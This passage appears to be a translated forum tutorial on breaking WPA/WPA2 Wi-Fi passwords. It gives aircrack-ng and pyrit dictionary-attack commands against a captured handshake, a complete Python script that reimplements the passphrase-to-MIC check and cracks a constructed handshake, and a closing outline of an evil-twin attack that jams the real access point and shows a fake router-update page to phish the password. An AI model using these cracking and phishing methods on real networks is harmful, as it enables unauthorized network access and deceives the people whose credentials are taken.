To get the Wi-Fi password we need to find a passphrase for which the MIC computed from our captured handshake matches the MIC stored in it (the handshake is not decrypted; every candidate is tried in turn). Each candidate costs a PBKDF2 derivation of 4096 HMAC-SHA1 iterations, which is what makes this slow. You can use a dictionary or enumerate by characters. Unless you have a supercomputer, enumeration is unlikely to suit you, since the number of candidates is the number of allowed characters raised to the password length (~95^8, about 6.6 × 10^15, for an 8-character passphrase of printable ASCII). Character enumeration makes sense if you know part of the password, which reduces the number of candidates, or if the password is constrained (for example digits only, or it follows the mobile-phone number format in your area). Here we brute-force the password with a dictionary.

We can crack the handshake on the CPU or on the GPU. If you have a powerful video card, the GPU is usually much faster.

We'll use aircrack-ng to crack on the CPU.
Code:
aircrack-ng wpacleaned.cap -w wordlist.txt
wpacleaned.cap - our cleaned and verified handshake
-w wordlist.txt - the dictionary from which passwords are tried

If the password is in the dictionary, then after a while you will see the corresponding message:
[screenshot: aircrack-ng "KEY FOUND!"]


It will contain your password, or a message that the dictionary is exhausted and the password was not found.

The GPU cracking utility pyrit has many more capabilities and tuning options, but those are for another time; for now we simply try to guess the password for the handshake with our dictionary. (pyrit has not been maintained for years and is absent from recent Kali releases; hashcat is the usual GPU cracker for WPA today.)
Code:
pyrit -r wpacleaned.cap -i wordlist.txt attack_passthrough
-r wpacleaned.cap - handshake file
-i wordlist.txt - dictionary file
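As an added example (not from the original post and not aircrack-ng's or pyrit's code), the following Python script shows exactly what those tools compute for every dictionary word: the PBKDF2 derivation of the PMK from the passphrase and ESSID, the 802.11i PRF that expands the PMK into the PTK, and the HMAC over the second handshake message whose MIC is compared with the captured one. The handshake it works on is constructed in the script itself (the network name, nonces and passphrase are made up; the MAC addresses are the ones from the commands above), so it runs offline, and the M1/M2 sanity checks before the loop correspond to what cowpatty -c and wpaclean verify.

```python
"""Offline WPA/WPA2-PSK dictionary attack on a captured 4-way handshake.

Added example; reimplements the per-candidate check of aircrack-ng (IEEE 802.11i):

    PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)
    PTK = PRF-512(PMK, "Pairwise key expansion",
                  min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    KCK = PTK[0:16]
    MIC = HMAC(KCK, EAPOL-Key message 2 with its MIC field zeroed)[:16]
          (HMAC-MD5 for WPA/TKIP = key descriptor version 1,
           HMAC-SHA1 for WPA2/CCMP = key descriptor version 2)
"""
import hashlib
import hmac
import struct

# EAPOL-Key frame layout: 802.1X header (4 bytes), then descriptor type(1),
# key info(2), key length(2), replay counter(8), nonce(32), IV(16), RSC(8),
# ID(8), MIC(16), key data length(2), key data. Hence the MIC sits at offset 81.
MIC_OFFSET = 81
MIC_LEN = 16


def parse_eapol_key(frame):
    """Extract the fields the attack needs from a raw EAPOL-Key frame."""
    if len(frame) < 99 or frame[1] != 3:          # 802.1X type 3 = EAPOL-Key
        raise ValueError("not an EAPOL-Key frame")
    key_info, = struct.unpack_from(">H", frame, 5)
    replay_counter, = struct.unpack_from(">Q", frame, 9)
    return {
        "version": key_info & 0x7,                 # 1 = HMAC-MD5, 2 = HMAC-SHA1
        "mic_set": bool(key_info & 0x0100),        # Key MIC bit
        "replay_counter": replay_counter,
        "nonce": frame[17:49],
        "mic": frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN],
    }


def prf512(pmk, label, data):
    """802.11i PRF-512: concatenated HMAC-SHA1(pmk, label || 0x00 || data || i)."""
    out = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def compute_mic(passphrase, essid, ap_mac, sta_mac, anonce, snonce, eapol_m2, version):
    """MIC that message 2 would carry if `passphrase` were the network password."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    kck = prf512(pmk, b"Pairwise key expansion", data)[:16]
    zeroed = eapol_m2[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_m2[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def crack_handshake(essid, ap_mac, sta_mac, eapol_m1, eapol_m2, wordlist):
    """Return the passphrase from `wordlist` whose MIC matches message 2, or None."""
    m1, m2 = parse_eapol_key(eapol_m1), parse_eapol_key(eapol_m2)
    # Same checks cowpatty -c / wpaclean make: M1 carries the ANonce without a MIC,
    # M2 carries the SNonce with a MIC, and both share one replay counter.
    if m1["mic_set"] or not m2["mic_set"] or m1["replay_counter"] != m2["replay_counter"]:
        raise ValueError("M1/M2 do not belong to the same handshake")
    for word in wordlist:
        if not 8 <= len(word) <= 63:               # WPA passphrase length limits
            continue
        if compute_mic(word, essid, ap_mac, sta_mac, m1["nonce"], m2["nonce"],
                       eapol_m2, m2["version"]) == m2["mic"]:
            return word
    return None


def build_eapol_key(version, replay_counter, nonce, mic_set, ack):
    """Assemble a minimal EAPOL-Key frame (RSN descriptor type 2, no key data)."""
    key_info = version | 0x0008 | (0x0080 if ack else 0) | (0x0100 if mic_set else 0)
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * MIC_LEN + struct.pack(">H", 0))
    return struct.pack(">BBH", 2, 3, len(body)) + body


def build_demo_handshake():
    """Constructed capture: made-up ESSID, nonces and passphrase; MACs from the post."""
    essid, true_pass = "example-net", "correct horse"
    ap_mac, sta_mac = bytes.fromhex("fc8b975797a9"), bytes.fromhex("683e3415399e")
    anonce, snonce = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()
    m1 = build_eapol_key(2, 1, anonce, mic_set=False, ack=True)     # AP -> client
    m2 = build_eapol_key(2, 1, snonce, mic_set=True, ack=False)     # client -> AP
    mic = compute_mic(true_pass, essid, ap_mac, sta_mac, anonce, snonce, m2, 2)
    m2 = m2[:MIC_OFFSET] + mic + m2[MIC_OFFSET + MIC_LEN:]
    return essid, ap_mac, sta_mac, m1, m2


DEMO_WORDLIST = ["password", "12345678", "correct horse", "qwertyuiop"]  # constructed

if __name__ == "__main__":
    essid, ap_mac, sta_mac, m1, m2 = build_demo_handshake()
    found = crack_handshake(essid, ap_mac, sta_mac, m1, m2, DEMO_WORDLIST)
    print("KEY FOUND! [ %s ]" % found if found else "Passphrase not in dictionary")
```

Every candidate is a full PBKDF2 run, so this pure-Python loop manages only a few hundred guesses per second; aircrack-ng, pyrit and hashcat implement the same arithmetic but vectorised and on many cores, which is the whole difference between them and this script.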
[screenshot: pyrit output]


If that doesn't work:

You can try a mix of social engineering and a Wi-Fi attack; there are two utilities for this:
A) Linset
B) Wifiphisher

Wifiphisher needs two Wi-Fi adapters. In short, it goes like this:
  • With the first adapter we jam the target access point (deauthentication)
  • On the second adapter we bring up an open access point with the same name
  • When the target cannot connect to and use its own access point, it may connect to ours
  • The target is shown a plausible-looking page asking for the Wi-Fi password so that the router can "finish an update".

In this case the correctness of the entered password is not checked (wifiphisher can verify it against a previously captured handshake if you give it one).
Linset works in a similar way. But the key feature of this utility is that it is in Spanish;
there is no English, let alone Russian, version, and unfortunately it did not start for me.

Thanks for attention!